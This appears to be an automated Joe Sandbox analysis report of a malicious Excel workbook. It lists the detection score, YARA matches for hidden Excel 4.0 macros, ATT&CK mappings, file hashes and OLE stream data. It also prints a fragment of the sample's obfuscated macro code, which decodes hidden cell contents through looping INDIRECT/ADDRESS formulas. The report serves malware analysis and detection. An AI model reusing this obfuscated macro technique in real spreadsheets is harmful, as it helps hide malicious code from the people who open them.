Analysis Report gv090x.xls
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
| |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
System Summary: |
---|
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Window title found: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection: |
---|
Hides that the sample has been downloaded from the Internet (zone.identifier) | Show sources |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting11 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Hidden Files and Directories1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356769 |
Start date: | 23.02.2021 |
Start time: | 16:23:13 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | gv090x.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.evad.winXLS@1/5@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 13922 |
Entropy (8bit): | 7.264421482311856 |
Encrypted: | false |
SSDEEP: | 384:hWmKH0IZVbKyachOSbQFnzaOX4boStjOiByI6b+7Cpbtcm70n:hWmQZVbKh4OPFzUVtxD64mwn |
MD5: | 93E4FCE088F41BBBEA379B5F0318513C |
SHA1: | 7B9C43B231A71E242C09E65C222359183D501526 |
SHA-256: | E818F316C5B07912DE21FF20813EF05A3AA92460563A9C1862EFF88DADC91D4E |
SHA-512: | E958D14F481E42C7DF181B83055CB10FB451B73D06776915D8BF068BC44122F2910E8FE681D4D0EE4BE2E9E243960BDA9111E02C38037FDE454C09D3E4CDCDE4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.476558463095134 |
Encrypted: | false |
SSDEEP: | 12:85QJ7RikLgXg/XAlCPCHaX2B8GB/YjxX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdJU:85sL/XTm6G0YefDv3qXqrNru/ |
MD5: | 8DBAD16D3CE185637239DD2B7306B309 |
SHA1: | 20DE769A3883F615AD99C6D40C39A37CC75337A6 |
SHA-256: | 662AC8A55B06F2EE00D386DB045337C1113ADD1E30D49730F4E66FFFC3F20DF7 |
SHA-512: | 27765EBD152367CEC106DA087580DCC254BE99CD5A6227143D393D83F5E0D3DB1E36D86DC312BA459B3D113D5E27ECDA3FF2E5CCDEFDEC7C2F11086B2E5BC966 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 1984 |
Entropy (8bit): | 4.4817661661631965 |
Encrypted: | false |
SSDEEP: | 24:83rk/XTm6GreVmVeMDv3qXqdM7dD23rk/XTm6GreVmVeMDv3qXqdM7dV:8Q/XTFGqYVKaQh2Q/XTFGqYVKaQ/ |
MD5: | 92FD3A9834599730DBAEF0FB99654045 |
SHA1: | 26B7394B203AB0AE8EB3CAE68057F393EBB863D5 |
SHA-256: | 4D929FAB468679E61C893EC2C33E73B397AFA8D4B9F77C0DC4DA57FB465CDC03 |
SHA-512: | 7008347ADFFC21244DFDE3F3C1BE60487EE5C4E5655861816ED43C3DA224648B63ADA025E980EC6AD15737C4A8E304239FE5E2B7509152179828B5F31A9A070F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 71 |
Entropy (8bit): | 4.165690479495976 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMzdpSaiVdpSmMzdpSv:dj6zdpeVdpEzdpc |
MD5: | E1ED9A88D8B36363A9E7BBA69AE5AA4F |
SHA1: | BAC0417433EE707A3F87DF6E960A9DBAA75D1C07 |
SHA-256: | FCF999F4FCEFEE407768E2917112D5BDF397D36BD798A991FE389FBDEB358502 |
SHA-512: | DA3E6EDCAB1051D76EE32047F5ED872E5673B3027761DB6FCF5E4D71E48E58F2D0ACF2AA3B3DFC1D9E56438FB5B8FD4FDD76BC3A122E0216AC21D2348E944F87 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45276 |
Entropy (8bit): | 5.099879850977744 |
Encrypted: | false |
SSDEEP: | 768:jjzi1PEYD/gM+3zdChRhohQMytjzi1pEYD/gM+s:/ziWooMZhAhQMezi0ooM9 |
MD5: | 9B9F375BE30EDD88E7554B2DC2F9FBBB |
SHA1: | 00081E5FCF06279CCC848EFA692C8B529968AF4B |
SHA-256: | 788249CD3BC4A18E34B68A959DCF122D76F8998B9484A757F05DC7B11776E012 |
SHA-512: | B6F88FFA3D01BE995250FF8030B7F2E39E712C5ACD7B63CBB5C1D579BE247FE647B0488C516BE7F4354F7883D1778098032C9014AF7652C94CE1B0B9D8787B17 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 4.199825067166816 |
TrID: |
|
File name: | gv090x.xls |
File size: | 36352 |
MD5: | 3ccb3ad55fdf18c9da2d3a6d3c64a1f1 |
SHA1: | e331cc1d0e38423264fc8f608d33980c0963cfc2 |
SHA256: | bbcf27717c056b3116002ea450057538f07592e9065a34e1ee61c364a6d8338d |
SHA512: | c665db0cb7a8a91611ea1596268d1dae282e49e06be78fc76de736dafa0d7faca8ef0a6804a120728c111f9da0001e2d78d325ac59b6cba5ce0b01eb3ac5d666 |
SSDEEP: | 384:hgC/9zi1xvqYc8YDknUgMB1WiS9ytS3hQI5SChQMy5v:pzi18EYD/gMjShR5ThQMyF |
File Content Preview: | ........................>.......................E...........................D.................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "gv090x.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2021-02-22 11:17:45 |
Last Saved Time: | 2021-02-22 11:19:00 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.336728312671 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . s c r i p t i n g . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.290384763425 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V q D W j H t e R . . . . . . . . . . . M i c h a . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . W . . . . @ . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a4 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 6c 00 00 00 0c 00 00 00 84 00 00 00 0d 00 00 00 90 00 00 00 13 00 00 00 9c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 0c 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 26461 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 26461 |
Entropy: | 5.15083338147 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . M i c h a B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . i K . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 4d 69 63 68 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,=GO,minu,gener,sta,assis,=WHI,disc,minu,unava,hid,solv,=WH,solve,sam,geral,cance,monro,injur,disc,gener,=NEXT,sch,=FOR,ant,=NE,=RET,nur,mem,mic,anti,int,=nu,,,,,,,,,,,,,,TO(,tes,ati,nford,tance,LE(,over,tes=,ilabl,den=L,e=0,ILE(s,=so,ple,d=COD,r=M,e=IN,ed=C,over=,ating,(),olar,MULA(,iqu,XT(),URN,se=R,orab,hel=,que,erfa,rse(,,,,,,,,,,,,,,R143C,=0,ng=0,=ROWS,=ROW,minut,"=""""",min,e=I,EN(un,xHcbSdhJXVO,olve,lve+1,s=MID,E(sa,OD(,DEX,HAR(,disco,=gene,xHcbSdhJXVO,shi,disc,e=an,xHcbSdhJXVO,(),118C,ili,R85C,=14,ces=,),,,,,,,,,,,,,,2),xHcbSdhJXVO,xHcbSdhJXVO,(me,S(m,es<s,xHcbSdhJXVO,ute,NDE,avail,,<hidd,xHcbSdhJXVO,(unav,mples,gen,(mich,MOD(g,ver&i,rati,,ps=A,"over,",tiqu,,xHcbSdhJXVO,2,a=Sh,14:R,9,2,xHcbSdhJXVO,,,,,,,,,,,,,,xHcbSdhJXVO,,,mora,ichel,tan,,s+1,X(mem,able,,en),,ail,)-3,era,"el,c",erald,nju,ng+,,DDRE,schol,e+1,,,xHcbSdhJXVO,eet1,94C14,xHcbSdhJXVO,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,bilia,),for,,xHcbSdhJXVO,ora,),,xHcbSdhJXVO,,able,2,tin,anc,-monr,red,1,,SS(,ars,xHcbSdhJXVO,,,,!R64C,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,),xHcbSdhJXVO,d),,,bilia,xHcbSdhJXVO,,,,",sol",xHcbSdhJXVO,"g,ass",er),"oe,9",xHcbSdhJXVO,xHcbSdhJXVO,,ant,hip,,,,,6:R,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,xHcbSdhJXVO,,,",minu",,,,,"ve,1",,istan,xHcbSdhJXVO,4)+3,,,,"ique,",s),,,,,79C6,,,,,,,,,,,,,,,,,,,,,,,,,,tes),,,,,),,ce)+,,2),,,,inte,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,xHcbSdhJXVO,,1,,xHcbSdhJXVO,,,,rface,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,"s,,FA",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"LSE,",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""scr",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ipti,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"ng""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xHcbSdhJXVO,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"residence=(VALUE(""0""))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(residence<32),,,,,,,,,,,,122,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,120,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,116,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=-1,,,,,,,,,,,,98,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,109,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,112,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,129,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,residence=residence+1,,,,,,,,,,,,124,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,130,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"operated=""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=WHILE(reducing<213),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SUM(-795,729)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=MAX(-899,-28)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,reducing=reducing+1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=INDIRECT(ADDRESS(reducing+45,15+residence))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=IF($B$104=""xHcbSdhJXVO"",SET.NAME(""reducing"",213),SET.NAME(""op
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 16:23:38 |
Start date: | 23/02/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f9a0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|